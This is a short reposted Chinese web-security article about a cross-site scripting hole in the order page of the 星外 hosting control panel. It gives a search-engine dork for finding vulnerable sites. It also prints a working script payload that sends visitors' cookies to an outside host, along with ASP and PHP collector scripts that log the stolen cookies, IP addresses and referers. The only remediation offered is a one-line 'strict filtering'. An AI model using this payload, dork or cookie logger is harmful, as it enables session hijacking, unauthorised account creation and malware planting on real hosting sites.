网站地图    收藏   

主页 > 后端 > 网站安全 >

星外订单提交处过滤不严导致XSS及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] google or baidu 搜索 inurl:user/order.asp?type=虚拟主机暂时只会XSS偷取cookie可以加帐号 可以后台挂马 等等等等XXS 偷取cookie代码scriptdocument.write(#39;img src=http://www.2cto.com /ne......

google or  baidu 搜索 inurl:user/order.asp?type=虚拟主机

暂时只会XSS偷取cookie
 可以加帐号 可以后台挂马 等等等等
 
 
XXS 偷取cookie代码
<script>document.write('<img src="http://www.2cto.com /news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
 
news.asp代码:
<%
msg=Request.ServerVariables("QUERY_STRING")   
testfile=Server.MapPath("cook.txt")   
set fs=server.CreateObject("scripting.filesystemobject")   
set thisfile=fs.OpenTextFile(testfile,8,True,0)   
thisfile.Writeline(""&msg& "")   
thisfile.close   
set fs = nothing   
%>
 
PHP版代码:
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cook.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
BY :CY

 修复:严格过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论